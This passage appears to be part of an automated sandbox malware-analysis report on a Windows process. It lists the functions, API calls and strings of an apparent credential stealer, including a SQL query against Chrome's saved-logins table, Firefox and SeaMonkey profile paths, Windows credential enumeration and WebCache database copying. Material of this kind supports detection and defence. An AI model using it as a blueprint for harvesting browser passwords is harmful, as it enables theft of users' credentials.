control_flow_graph: function at 00408D9D (basic blocks 00408D9D-00408FA1), rendered as an image in the original report; the raw edge list is omitted here. The entry block calls 004057C4 and 004059F7; the exit path calls 0040580A. The body is a loop (00408DF6 back to itself through 00408F68) that calls 00405CF6, then 00408801 seven times (a _wcsicmp wrapper, likely one call per field name listed under Strings), memset, 0040805C, 00406295, wcschr, four memcpy calls, and 004059BA on each iteration, with 00408037 and free on the way out.
APIs
  • Part of subcall function 004059F7: _wcsicmp.MSVCRT ref: 00405A28
  • Part of subcall function 00405CF6: memset.MSVCRT ref: 00405DF2
• free.MSVCRT(00000000), ref: 00408F8C
  • Part of subcall function 00408801: _wcsicmp.MSVCRT ref: 0040881A
• memset.MSVCRT ref: 00408E72
  • Part of subcall function 0040805C: wcslen.MSVCRT ref: 0040806F
  • Part of subcall function 0040805C: memcpy.MSVCRT ref: 0040808E
• wcschr.MSVCRT ref: 00408EAA
• memcpy.MSVCRT ref: 00408EDE
• memcpy.MSVCRT ref: 00408EF9
• memcpy.MSVCRT ref: 00408F14
• memcpy.MSVCRT ref: 00408F2F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
• String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
• API String ID: 3849927982-2252543386
• Opcode ID: 3968a81090f0c90a0f1d759d5c6f86966b5d18dba44d1eb1d150c3d2a019c511
• Instruction ID: 190f3b00b4426260eb01f26a53b79380eacfea7d83453a492e965ac02b193b52
• Opcode Fuzzy Hash: 3968a81090f0c90a0f1d759d5c6f86966b5d18dba44d1eb1d150c3d2a019c511
• Instruction Fuzzy Hash: 64510C72E00309AAEF10EFA5DD45A9EB7B9AF54314F14403FA544F7281EA78AA048F58
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 00408836: memset.MSVCRT ref: 0040885E
  • Part of subcall function 00408836: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408885
  • Part of subcall function 00408836: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 004088C6
  • Part of subcall function 00408836: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 004088EF
  • Part of subcall function 00408836: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 004088FA
  • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
• OpenProcess.KERNEL32(00000040,00000000,?,00000104,00000000,?,00000104,00000000,00000000,00000104,Microsoft\Windows\WebCache\WebCacheV01.dat), ref: 00408B85
• GetCurrentProcess.KERNEL32(00000000,80000000,00000000,00000000), ref: 00408BA4
• DuplicateHandle.KERNELBASE(00000000,00000104,00000000), ref: 00408BB1
• GetFileSize.KERNEL32(00000000,00000000), ref: 00408BC6
  • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
  • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
  • Part of subcall function 004074C6: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00407506
  • Part of subcall function 0040715D: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040C5D7,?,?,00000000,00000001,?,?,?,0040E2DC), ref: 0040716F
• CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00408BF0
• MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 00408C05
• WriteFile.KERNELBASE(?,00000000,00000104,004091EB,00000000), ref: 00408C20
• UnmapViewOfFile.KERNEL32(00000000), ref: 00408C27
• FindCloseChangeNotification.KERNELBASE(?), ref: 00408C30
• CloseHandle.KERNEL32(?), ref: 00408C35
• CloseHandle.KERNEL32(00000000), ref: 00408C3A
• CloseHandle.KERNEL32(00000000), ref: 00408C3F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: File$Close$Handle$CreateProcess$ChangeCurrentFindNotificationTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWritememset
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$bhv
• API String ID: 3663438264-4002013007
• Opcode ID: 92f9f1b067ef90b6ccee0d8b67f312e4d5537bffff8df701e651ec9a81ff62ca
• Instruction ID: 68c5544b499915da94545e51db83da674be7fd43246ed759ba52d344f26358cd
• Opcode Fuzzy Hash: 92f9f1b067ef90b6ccee0d8b67f312e4d5537bffff8df701e651ec9a81ff62ca
• Instruction Fuzzy Hash: CD412775901218BBDF11AF95CD899DFBFB9EF09751F10802AF608A6250DB349A40CFA9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• memset.MSVCRT ref: 0040286E
• CreateFileW.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00402882
• CopyFileW.KERNEL32(?,?,00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004028A3
• FindCloseChangeNotification.KERNELBASE(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004028AE
• memset.MSVCRT ref: 004028C7
• DeleteFileW.KERNEL32(?,?,?,?,?,00000003,00000000,00000000), ref: 00402B1A
  • Part of subcall function 004074C6: GetTempPathW.KERNEL32(00000104,?), ref: 004074DD
  • Part of subcall function 004074C6: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004074EF
  • Part of subcall function 004074C6: GetTempFileNameW.KERNELBASE(?,00000000,00000000,?), ref: 00407506
• memset.MSVCRT ref: 0040293C
  • Part of subcall function 004027D7: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040280F
  • Part of subcall function 004027D7: FileTimeToLocalFileTime.KERNEL32(?), ref: 0040283C
  • Part of subcall function 00407DF5: MultiByteToWideChar.KERNEL32(00000000,00000000,004029BE,000000FF,?,?,004029BE,?,?,000003FF), ref: 00407E07
  • Part of subcall function 00403853: LoadLibraryW.KERNEL32(crypt32.dll,?,00000000,004026AC,?,00000090,00000000,?), ref: 00403862
  • Part of subcall function 00403853: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00403874
  • Part of subcall function 00403853: FreeLibrary.KERNEL32(00000000), ref: 00403897
• memset.MSVCRT ref: 00402A95
• memcpy.MSVCRT ref: 00402AA8
• LocalFree.KERNEL32(00000000,?,?,000000FF,?,?,?,00000000,00000000,00000003), ref: 00402AD2
Strings
• chp, xrefs: 0040288D
• SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins , xrefs: 00402908
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: File$Timememset$FreeLibraryLocalTemp$AddressByteChangeCharCloseCopyCreateDeleteDirectoryFindLoadMultiNameNotificationPathProcSystemWideWindowsmemcpy
• String ID: SELECT origin_url, action_url, username_element, username_value, password_element, password_value, signon_realm, date_created from logins $chp
• API String ID: 3603309061-1844170479
• Opcode ID: d0caedd4ff45bc23c3f78f8d9d05a4faab82fa60d4f04c7d7ee099d959827c57
• Instruction ID: e637edadd966e00c71b87c8ff6cc297e5f4b8f19ec80fc414d035a4907c068e8
• Opcode Fuzzy Hash: d0caedd4ff45bc23c3f78f8d9d05a4faab82fa60d4f04c7d7ee099d959827c57
• Instruction Fuzzy Hash: 37815172D001186BDB11EBA59D46BEEB7BCAF04304F5404BAF509F7281EB786F448B69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendered as an image in the original report (legend: Executed / Not Executed); basic blocks 40f0d5 through 40f2e3, calling memset, wcslen, sub_412270, sub_4076a9, sub_40ef37, sub_407e96, sub_40f4f7, sub_407fe8, sub_407447, sub_407f88 and sub_407eb8]
APIs
• memset.MSVCRT ref: 0040F0F8
• memset.MSVCRT ref: 0040F10D
• memset.MSVCRT ref: 0040F122
• memset.MSVCRT ref: 0040F137
• memset.MSVCRT ref: 0040F14C
  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
  • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
  • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
  • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
• wcslen.MSVCRT ref: 0040F172
• wcslen.MSVCRT ref: 0040F183
• wcslen.MSVCRT ref: 0040F1BB
• wcslen.MSVCRT ref: 0040F1C9
• wcslen.MSVCRT ref: 0040F202
• wcslen.MSVCRT ref: 0040F210
• memset.MSVCRT ref: 0040F296
  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 2775653040-2068335096
• Opcode ID: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
• Instruction ID: ad2d2467b554b91bbb49091aa47d9e820c56345a74be7af74479530b55ef6358
• Opcode Fuzzy Hash: 18f6131305a60b3f130847a1eef602165254ae3e8930c32a00b7771f504cc504
• Instruction Fuzzy Hash: 2A514472905219AADB20E751DD86ECF73BC9F44344F5004FBF109F6181EBB96B888B69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Control-flow graph rendered as an image in the original report (legend: Executed / Not Executed); basic blocks 40f2e6 through 40f4f4, calling memset, wcslen, sub_412270, sub_4076a9, sub_40ef37, sub_407e96, sub_40f4f7, sub_407fe8, sub_407447, sub_407f88 and sub_407eb8]
APIs
• memset.MSVCRT ref: 0040F309
• memset.MSVCRT ref: 0040F31E
• memset.MSVCRT ref: 0040F333
• memset.MSVCRT ref: 0040F348
• memset.MSVCRT ref: 0040F35D
  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
  • Part of subcall function 00412270: memset.MSVCRT ref: 004122C9
  • Part of subcall function 00412270: RegCloseKey.ADVAPI32(?), ref: 00412330
  • Part of subcall function 00412270: wcscpy.MSVCRT ref: 0041233E
• wcslen.MSVCRT ref: 0040F383
• wcslen.MSVCRT ref: 0040F394
• wcslen.MSVCRT ref: 0040F3CC
• wcslen.MSVCRT ref: 0040F3DA
• wcslen.MSVCRT ref: 0040F413
• wcslen.MSVCRT ref: 0040F421
• memset.MSVCRT ref: 0040F4A7
  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$wcslen$wcscpy$CloseFolderPathSpecialwcscat
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• API String ID: 2775653040-3369679110
• Opcode ID: ac2960c7c8775963d9ae5b6668c4b7d17b3d9d294ecd60d63349e7bf8572b4d3
• Instruction ID: 627aa7309af3ce9e50a65207db29ad7cec2a96110015b88e099c10597549be0d
• Opcode Fuzzy Hash: ac2960c7c8775963d9ae5b6668c4b7d17b3d9d294ecd60d63349e7bf8572b4d3
• Instruction Fuzzy Hash: B15174729052196ADB20EB51CD85ECF73BC9F54304F5004FBF508F2081EBB96B888B69
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 539 41139e-4113a1 540 4113f3 539->540 541 4113a3-4113f2 LoadLibraryW GetProcAddress * 5 539->541 541->540
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNELBASE(psapi.dll,00000000,0041137E,00000000,0041126B,00000000,?), ref: 004113A9
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004113BD
                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 004113C9
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 004113D5
                                                                                                                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 004113E1
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 004113ED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                    • API String ID: 2238633743-70141382
                                                                                                                                                    • Opcode ID: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
                                                                                                                                                    • Instruction ID: b0fa25657284a8e9196716ee499a251a0e3e908d4b843c37df8f242eb1d66817
                                                                                                                                                    • Opcode Fuzzy Hash: 7d64db311815f5693af3cb75c4746d4d82b2a24bf7d3ef9ccff621f71f8c2f2c
                                                                                                                                                    • Instruction Fuzzy Hash: A3F03478988704AEEB30AF75DC08E07BEF0EFA8B11721892EE0C593650D7799441EF58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 542 408619-408637 call 4037c3 545 4087f2-4087fe call 40383e 542->545 546 40863d-408646 542->546 547 408657 546->547 548 408648-408655 CredEnumerateW 546->548 550 408659-40865b 547->550 548->550 550->545 552 408661-40868a wcslen 550->552 553 408690-408692 552->553 554 4087ec 552->554 553->554 555 408698-4086b8 wcsncmp 553->555 554->545 556 4087dd-4087e6 555->556 557 4086be-4086d5 555->557 556->553 556->554 557->557 558 4086d7-40870b call 403853 557->558 558->556 561 408711-408737 memset 558->561 562 408739 561->562 563 40873b-408781 memcpy 561->563 562->563 564 4087a0-4087bc wcschr 563->564 565 408783-408795 _wcsnicmp 563->565 567 4087c7-4087d7 LocalFree 564->567 568 4087be-4087c4 564->568 565->564 566 408797-40879d 565->566 566->564 567->556 568->567
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004037C3: LoadLibraryW.KERNEL32(advapi32.dll,00000000,00408635,?,00000000,?), ref: 004037D0
                                                                                                                                                      • Part of subcall function 004037C3: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004037E9
                                                                                                                                                      • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredFree), ref: 004037F5
                                                                                                                                                      • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00403801
                                                                                                                                                      • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 0040380D
                                                                                                                                                      • Part of subcall function 004037C3: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00403819
                                                                                                                                                    • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 00408652
                                                                                                                                                    • wcslen.MSVCRT ref: 00408678
                                                                                                                                                    • wcsncmp.MSVCRT(?,?,?,?,00000000,?), ref: 004086AE
                                                                                                                                                    • memset.MSVCRT ref: 00408725
                                                                                                                                                    • memcpy.MSVCRT ref: 00408746
                                                                                                                                                    • _wcsnicmp.MSVCRT ref: 0040878B
                                                                                                                                                    • wcschr.MSVCRT ref: 004087B3
                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000001,?,?,00000000,?), ref: 004087D7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CredEnumerateFreeLibraryLoadLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                    • String ID: J$Microsoft_WinInet$Microsoft_WinInet_
                                                                                                                                                    • API String ID: 1313344744-1864008983
                                                                                                                                                    • Opcode ID: 212f3f294c9ab8b83a3dc136b78cffcc3e5b2f11c9e98eede468f190287508d3
                                                                                                                                                    • Instruction ID: ae9214853af189039b11f9ecdcfbf9e5a6a1e8940f9aa775dff38fc8017bd4cb
                                                                                                                                                    • Opcode Fuzzy Hash: 212f3f294c9ab8b83a3dc136b78cffcc3e5b2f11c9e98eede468f190287508d3
                                                                                                                                                    • Instruction Fuzzy Hash: E45129B5D00209AFDB20DFA4C981A9EB7F8FF08304F14446EE959F7241EB34A945CB19
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 570 442628-442642 call 442838 GetModuleHandleA 573 442644-44264f 570->573 574 442663-442666 570->574 573->574 575 442651-44265a 573->575 576 44268f-4426de __set_app_type __p__fmode __p__commode call 412c59 574->576 577 44265c-442661 575->577 578 44267b-44267f 575->578 585 4426e0-4426eb __setusermatherr 576->585 586 4426ec-442742 call 442824 _initterm __wgetmainargs _initterm 576->586 577->574 580 442668-44266f 577->580 578->574 581 442681-442683 578->581 580->574 583 442671-442679 580->583 584 442689-44268c 581->584 583->584 584->576 585->586 589 442744-44274d 586->589 590 442752-442759 586->590 591 44280c-442811 call 442871 589->591 592 4427a0-4427a4 590->592 593 44275b-442766 590->593 597 4427a6-4427ab 592->597 598 442779-44277f 592->598 594 44276e-442772 593->594 595 442768-44276c 593->595 594->598 599 442774-442776 594->599 595->593 595->594 597->592 601 442787-442798 GetStartupInfoW 598->601 602 442781-442785 598->602 599->598 603 4427ad-4427af 601->603 604 44279a-44279e 601->604 602->599 602->601 605 4427b0-4427c8 GetModuleHandleA call 40e2f1 603->605 604->605 608 4427d1-44280a _cexit 605->608 609 4427ca-4427cb exit 605->609 608->591 609->608
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2827331108-0
                                                                                                                                                    • Opcode ID: c0523eba28cc456e55dc8711b9221e28c9e3236c1c393efd04d0a35b8240f2f2
                                                                                                                                                    • Instruction ID: 706d3d187beade5fd8be42c29aa928e65c4a76933a7b40434c1f532ca5c4ff1d
                                                                                                                                                    • Opcode Fuzzy Hash: c0523eba28cc456e55dc8711b9221e28c9e3236c1c393efd04d0a35b8240f2f2
                                                                                                                                                    • Instruction Fuzzy Hash: 1E51C674C00305DFEB21AF64DA44AADB7B4FB05B15FA0422BF811A7291D7B84982CF5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040952C
                                                                                                                                                      • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
                                                                                                                                                      • Part of subcall function 004090DF: memset.MSVCRT ref: 00409102
                                                                                                                                                      • Part of subcall function 004090DF: memset.MSVCRT ref: 0040911A
                                                                                                                                                      • Part of subcall function 004090DF: wcslen.MSVCRT ref: 00409136
                                                                                                                                                      • Part of subcall function 004090DF: wcslen.MSVCRT ref: 00409145
                                                                                                                                                      • Part of subcall function 004090DF: wcslen.MSVCRT ref: 0040918C
                                                                                                                                                      • Part of subcall function 004090DF: wcslen.MSVCRT ref: 0040919B
                                                                                                                                                      • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                                                                                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004095A1
                                                                                                                                                    • wcschr.MSVCRT ref: 004095B8
                                                                                                                                                    • wcschr.MSVCRT ref: 004095D8
                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 004095FD
                                                                                                                                                    • GetLastError.KERNEL32 ref: 00409607
                                                                                                                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 00409633
                                                                                                                                                    • FindCloseUrlCache.WININET(?), ref: 00409644
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CacheFindwcslen$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                    • String ID: visited:
                                                                                                                                                    • API String ID: 615219573-1702587658
                                                                                                                                                    • Opcode ID: 8f876ec4458d3f1ed4e4dc218a1084821821df0a90adecac85d6e07ab5b1aeff
                                                                                                                                                    • Instruction ID: 77a6c5406e07bb2a3f369751b76910ce3bd9900599f044f3c0855e39104cf3e1
                                                                                                                                                    • Opcode Fuzzy Hash: 8f876ec4458d3f1ed4e4dc218a1084821821df0a90adecac85d6e07ab5b1aeff
                                                                                                                                                    • Instruction Fuzzy Hash: 7F417F72D00219BBDB11DF95CD85A9EBBB8EF05714F10406AE505F7281DB38AF41CBA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 636 408c67-408c93 call 4057c4 call 4059f7 641 408c99-408cd7 memset 636->641 642 408d8b-408d9a call 40580a 636->642 644 408cda-408cec call 405cf6 641->644 648 408d62-408d6f call 4059ba 644->648 649 408cee-408d0b call 408801 * 2 644->649 648->644 654 408d75-408d78 648->654 649->648 660 408d0d-408d0f 649->660 656 408d83-408d86 call 408037 654->656 657 408d7a-408d82 free 654->657 656->642 657->656 660->648 661 408d11-408d27 call 406295 660->661 661->648 664 408d29-408d34 call 408116 661->664 664->648 667 408d36-408d5d _snwprintf call 407ede 664->667 667->648
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004059F7: _wcsicmp.MSVCRT ref: 00405A28
                                                                                                                                                    • memset.MSVCRT ref: 00408CAF
                                                                                                                                                      • Part of subcall function 00405CF6: memset.MSVCRT ref: 00405DF2
                                                                                                                                                    • free.MSVCRT(000000FF,?,000000FF,00000000,00000104,7519F560), ref: 00408D7D
                                                                                                                                                      • Part of subcall function 00408801: _wcsicmp.MSVCRT ref: 0040881A
                                                                                                                                                      • Part of subcall function 00408116: wcslen.MSVCRT ref: 00408125
                                                                                                                                                      • Part of subcall function 00408116: _memicmp.MSVCRT ref: 00408153
                                                                                                                                                    • _snwprintf.MSVCRT ref: 00408D49
  • Part of subcall function 00407EDE: wcslen.MSVCRT ref: 00407EF0
  • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F16
  • Part of subcall function 00407EDE: free.MSVCRT(?,00000001,?,00000000,?,?,0040833F,?,000000FF), ref: 00407F39
  • Part of subcall function 00407EDE: memcpy.MSVCRT ref: 00407F5D
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
• String ID: $ContainerId$Container_%I64d$Containers$Name
• API String ID: 2804212203-2982631422
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00407EB8: free.MSVCRT(?,00408225,00000000,?,00000000), ref: 00407EBB
  • Part of subcall function 00407EB8: free.MSVCRT(?,?,00408225,00000000,?,00000000), ref: 00407EC3
  • Part of subcall function 00408037: free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
  • Part of subcall function 00409508: memset.MSVCRT ref: 0040952C
  • Part of subcall function 00409508: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 004095A1
  • Part of subcall function 00409508: wcschr.MSVCRT ref: 004095B8
  • Part of subcall function 00409508: wcschr.MSVCRT ref: 004095D8
  • Part of subcall function 00409508: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 004095FD
  • Part of subcall function 00409508: GetLastError.KERNEL32 ref: 00409607
  • Part of subcall function 00409657: memset.MSVCRT ref: 004096C7
  • Part of subcall function 00409657: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,?,?,?,?,00000000,?), ref: 004096F5
  • Part of subcall function 00409657: _wcsupr.MSVCRT ref: 0040970F
  • Part of subcall function 00409657: memset.MSVCRT ref: 0040975E
  • Part of subcall function 00409657: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,80000001,80000001,?,000000FF,?,?,?,?,00000000), ref: 00409789
  • Part of subcall function 004038C4: LoadLibraryW.KERNEL32(advapi32.dll,?,00409AAA,?,https://login.yahoo.com/config/login,00000000,http://www.facebook.com/,00000000,https://www.google.com/accounts/servicelogin,00000000,?,00000000,?,0041018E,?,?), ref: 004038CF
  • Part of subcall function 004038C4: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004038E3
  • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 004038EF
  • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 004038FB
  • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00403907
  • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00403913
  • Part of subcall function 004038C4: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 0040391F
• _wcslwr.MSVCRT ref: 00409AFC
• wcslen.MSVCRT ref: 00409B11
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressProc$freememset$CacheEntryEnumFindValuewcschr$ErrorFirstLastLibraryLoadNext_wcslwr_wcsuprwcslen
• String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
• API String ID: 4091582287-4196376884
Uniqueness
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 00409102
• memset.MSVCRT ref: 0040911A
  • Part of subcall function 00412270: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 004122AA
• wcslen.MSVCRT ref: 00409136
• wcslen.MSVCRT ref: 00409145
• wcslen.MSVCRT ref: 0040918C
• wcslen.MSVCRT ref: 0040919B
  • Part of subcall function 004076A9: wcscpy.MSVCRT ref: 004076B1
  • Part of subcall function 004076A9: wcscat.MSVCRT ref: 004076C0
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: wcslen$memset$FolderPathSpecialwcscatwcscpy
• String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
• API String ID: 2036768262-2114579845
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
